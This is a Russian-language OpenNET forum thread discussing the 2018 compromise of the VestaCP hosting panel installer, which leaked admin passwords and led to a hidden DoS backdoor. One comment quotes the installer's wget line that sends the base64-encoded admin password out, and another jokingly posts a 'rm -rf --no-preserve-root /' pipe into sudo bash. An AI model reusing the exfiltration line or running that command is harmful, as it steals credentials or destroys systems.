The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]



"Злоумышленники добавили вредоносный код в скрипт установки х..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от opennews (??), 18-Окт-18, 13:47 
В установочном скрипте панели управления хостингом VestaCP выявлен (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) код, выполняющий отправку параметров аутентификации для доступа к системе пользователя. В частности, в штатную систему отправки телеметрии, которая в ответ на внешний запрос осуществляет вывод названия дистрибутива, добавлены дополнительные параметры, выдающие пароль администратора и IP текущего хоста.

Индикатором утечки данных является наличие в логе запросов вида "http://vestacp.com/test/?ip=x.x.x.x". Если данная активность наблюдается, то вероятно уже недостаточно просто сменить пароль администратора. После получения параметров доступа, атакующие устанавливали бэкдор, который мог выглядеть как системный файл
/usr/bin/dhcprenew, реализующий командный сервер для участия в совершении DoS-атак и предоставляющий скрытый shell. После запуска указанный бэкдор маскируется под видом процесса "[kworker/1:1]".

В ходе начального разбора инцидента выяснилось, что код удалось изменить в результате взлома некоторых серверов инфраструктуры проекта. Взлом произведён при помощи новой уязвимости, вызванной ошибкой в API, появившейся в апрельском выпуске 0.9.8-20 (https://forum.vestacp.com/viewtopic.php?f=25&p=68895#p68895). Проблемы устранены (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) в выпуске 0.9.8-23 (https://github.com/serghey-rodin/vesta/commit/cde42691701667...). Дополнительные подробности пока не сообщаются.


URL: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...
Новость: https://www.opennet.ru/opennews/art.shtml?num=49457

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +16 +/
Сообщение от Аноним (1), 18-Окт-18, 13:47 
> штатную систему отправки телеметрии

Ух. Хорошо зашли.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +5 +/
Сообщение от А (??), 18-Окт-18, 14:51 
> которая в ответ на внешний запрос осуществляет вывод названия дистрибутива

ха-а-арошая какая телеметрия. она еще и запросы штатно принимает. вообще класс. штатную телеметрию  модернизировали до телеуправления.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

10. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –20 +/
Сообщение от Аноним (10), 18-Окт-18, 16:26 
А ты как собираешься без запросов спросить телеметрию, умник?
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

11. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +15 +/
Сообщение от Аноним (11), 18-Окт-18, 16:49 
А не надо её спрашивать. Можно сделать, чтобы клиент телеметрии сам отправлял её по расписанию, скажем, раз в неделю. Без запросов с сервера.
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

17. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Himik (ok), 18-Окт-18, 18:56 
Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP. Хотябы название статьи читали. Если сервер не отвечает на запросы, то это не сервер.
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

22. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (22), 18-Окт-18, 23:32 
Ага, рабочая станция значит, так?
А если рабочая станция отвечает, то сервер, блин у меня оказывается ЦОД набитый серверами...
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

19. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Ирокез (?), 18-Окт-18, 19:58 
Ш10 отправляет ваши данные в микрософт говорили они.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

25. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Аноним (-), 19-Окт-18, 08:26 
Дурной пример заразителен. Веб-абизянки тоже хотят быть как большая компания.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

2. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –1 +/
Сообщение от mikhailnov (ok), 18-Окт-18, 14:07 
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +5 +/
Сообщение от Аноним (3), 18-Окт-18, 14:29 
Если не забывать о том, что введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

31. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –2 +/
Сообщение от Аноним (31), 19-Окт-18, 16:42 
> введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".

Наш ответ: https://hackage.haskell.org/package/sproxy2

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

8. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Аноним (8), 18-Окт-18, 15:06 
Как это спасёт от "бэкдора в установочном скрипте"?

Безопасности удалятся 0, информирование через месяц (ветка форума eng раздела, спасибо, что после обновления, скрипт проверки отработает), fail2ban/firewall так и научили определять порты "/usr/local/vesta/bin/v-add-firewall-chain" (не дефолтный фтп). И нет, у меня всё чисто, но уже напрягает.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

9. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +9 +/
Сообщение от scorry (ok), 18-Окт-18, 15:47 
«поставил себе вирус. закрыл файрволлом. я хаккир.»
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

13. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +7 +/
Сообщение от th3m3 (ok), 18-Окт-18, 16:59 
На что только не пойдут, лишь бы консолью не пользоваться.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

15. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +8 +/
Сообщение от Аноним (15), 18-Окт-18, 18:13 
Ваш комментарий огорчает молодых специалистов.
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

4. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от CHERTSemail (ok), 18-Окт-18, 14:37 
Ох и рeшето... других слов просто нет.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –4 +/
Сообщение от Аноним (5), 18-Окт-18, 14:39 
Давно знал что майкрософты ужасное по делают
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +3 +/
Сообщение от th3m3 (ok), 18-Окт-18, 16:53 
Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +7 +/
Сообщение от FedeX (ok), 18-Окт-18, 17:09 
Не зря матери дочерей учат - "Кто не учился, те работают на панели и заразы всякой набираются".
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

18. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +2 +/
Сообщение от Аноним (18), 18-Окт-18, 19:25 
А потому служат Нурглу и Слаанеш сразу?
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

16. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Анонимemail (16), 18-Окт-18, 18:36 
статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили.
codename="$codename:$(echo $vpass:$servername | base64)"
wget vestacp.com/notify/?$codename -O /dev/null -q

https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424...
https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c...

а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором

а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +2 +/
Сообщение от Борщдрайвен бигдата (?), 18-Окт-18, 20:41 
> сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили

Но зачем?!

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

21. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +3 +/
Сообщение от Типа хомячок (?), 18-Окт-18, 23:04 
'Cause they can, очевидно же.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

23. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от KonstantinB (??), 19-Окт-18, 06:26 
Шикарно.

И это тот случай, когда открытые исходники не помогут: те, кто умеет их читать, не пользуются панелями, и наоборот. :-)

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

28. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от нах (?), 19-Окт-18, 10:37 
хинт: те кто умеет их читать, не пользуются панелями, а продают их как услугу.

Правда, вряд ли на свете много продающих хостинг на весте - коммерческие хостеры обычно используют cpanel или ispmgr (оба феерическое невменяемое гуанище с закрытым кодом, больными yблюдкaми в менеджменте и рукoжoпыми гoвнoкодерами, но ничего лучшего опенсосеры не родили)

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

37. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от KonstantinB (ok), 20-Окт-18, 04:03 
Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет 5 это все никому, кроме пожилых сеошников, не надо.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

39. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –1 +/
Сообщение от пох (?), 20-Окт-18, 10:46 
> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.

угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пророк ихний.


Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

40. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –1 +/
Сообщение от Vitaliy Blatsemail (?), 20-Окт-18, 12:40 
> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.

Это ты так думаешь. В мире мало того что куча VPS'ок с предустановленной панелью, так еще и куча сайтов на шаред-хостинге, где так же используются эти панели.

Мы, пожилые сеошники конечно рады, что ты великий гуру можешь купить VPS'ку, задеплоить туда твою Убунтачку, поставить туда LAMP, exim с dovecot'ом, вебмылом и спамассасином, ну и само собой разумеется сгенерить DKIM'ы дабы письмецы не попадали в спам, написать скрипты добавления мыльных аккаунтов и доменов (просто если ты будешь добавлять это вручную - то ты еще фееричнее кретин чем я думал) и все это за 5 баксов - но мы НЕ ТАКИЕ, мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

41. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от пох (?), 20-Окт-18, 19:35 
> мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить.
Он, конечно,предлагает хоститься на его сервере, но, поскольку он его сам настраивал, как умел, тот сервер половину времени не работает, и во всех блоклистах отметился, а еще он на нем немножечко майнит.

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

24. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от odd.mean (ok), 19-Окт-18, 07:38 
Хорошую вещь "CP" не назовут.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

26. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (26), 19-Окт-18, 09:41 
И альта-вистой тоже....
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

44. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (44), 21-Окт-18, 06:23 
а CP/M ?
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

45. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от odd.mean (ok), 21-Окт-18, 08:40 
Ну разве что CP/M. Да и то...
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

27. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –2 +/
Сообщение от Аноним (26), 19-Окт-18, 09:44 
Есть Ajenti не вижу смысла в существовании этого плохо-кода.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Vitaliy Blatsemail (?), 19-Окт-18, 12:17 
> Есть Ajenti не вижу смысла в существовании этого плохо-кода.

Есть %software_name1% не вижу смысла в существовании этого %software_name2%.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

32. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (31), 19-Окт-18, 21:06 
Fuck me

https://github.com/serghey-rodin/vesta:

```
Download the installation script:

curl -O http://vestacp.com/pub/vst-install.sh

Then run it:

bash vst-install.sh
```

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

33. "Злоумышленники добавили вредоносный код в скрипт установки х..."  –2 +/
Сообщение от пох (?), 19-Окт-18, 21:46 
прости, а то что он тебе понаустановит - ты запускать вообще не планируешь? Или предполагаешь, что баш чем-то страшнее и ужаснее php?

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

34. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +1 +/
Сообщение от Грусть (?), 19-Окт-18, 22:59 
Вам следует настроить свой камертон на curl http://...
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

42. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от пох (?), 20-Окт-18, 19:39 
ой, какой ужас, злые соседи...э...какие нахрен соседи, мы что дома ставимся? Злые враги инженеры хостера...э...стоп, а им зачем, они прямо на диск могут записать... э... ну я уж прям не знаю кто - магистральные операторы в терабитах порнухи и котиков разглядели наш невинный curl и подбросили вражеский код, да?

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

35. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (35), 19-Окт-18, 23:16 
echo "rm -rf --no-preserve-root /" | sudo bash
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

36. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от Аноним (36), 20-Окт-18, 01:43 
curl2bash™
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

38. "Злоумышленники добавили вредоносный код в скрипт установки х..."  +/
Сообщение от annual slayer (?), 20-Окт-18, 06:45 
есть уже `curl --rootme`
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема


  Закладки на сайте
  Проследить за страницей
Created 1996-2018 by Maxim Chirkov  
ДобавитьПоддержатьВебмастеруГИД  
Hosting by Ihor